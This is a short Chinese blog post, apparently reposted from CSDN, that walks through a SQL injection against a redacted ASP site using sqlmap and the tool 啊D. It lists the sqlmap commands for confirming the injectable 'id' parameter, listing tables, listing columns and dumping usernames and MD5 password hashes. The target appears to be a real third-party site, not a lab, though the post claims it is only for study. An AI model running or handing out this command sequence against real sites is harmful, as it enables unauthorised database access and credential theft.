简单sql注入实战

sqlmap相关

​写在前面:对于某网http://www.xxxx.com/xxxxx.asp?id=11,我采取了sqlmap和啊D两个工具一起来进行sql注入。当然是只作为学习sqlmap和总结语句用,仅供参考,我们要富强、民主、文明、和谐,自由、平等、公正、法治,爱国、敬业、诚信、友善

  1. 啊D

  1. Sqlmap:

    检查注入点是否存在:

    sqlmap.py -u "http://www.xxxxx.com/xxxxx.asp?id=11"

    可得存在boolean-based blind注入,注入参数id为GET注入,web服务器系统为windows2003 or xp,web应用程序技术为ASP.NET, Microsoft IIS 6.0,数据库类型为Microsoft Access

    爆库,发现没有,接下来直接爆表

    sqlmap.py -u "http://www.xxxx.com/xxxxx.asp?id=11" —tables

  2. 选择user表来爆字段

    sqlmap.py -u "http://www.xxxx.com/xxxx.asp?id=11" -T user --columns

    选择id,name和passwords来爆内容

    sqlmap.py -u "http://www.xxxxxx.com/xxxx.asp?id=11" -T admin -C "id,name,pass" --dump

    得到用户名和密码(MD5加密)

对比起来,啊D比sqlmap方便快捷,而且由于字典不同sqlmap在爆字段的时候并没有爆出passwords的字段,但是啊D爆出了,最后爆字段内容的时候,sqlmap比啊D速度快,啊D爆字段内容会卡住....试了好几次才完全爆出来


猜你喜欢

转载自blog.csdn.net/mukami0621/article/details/78762305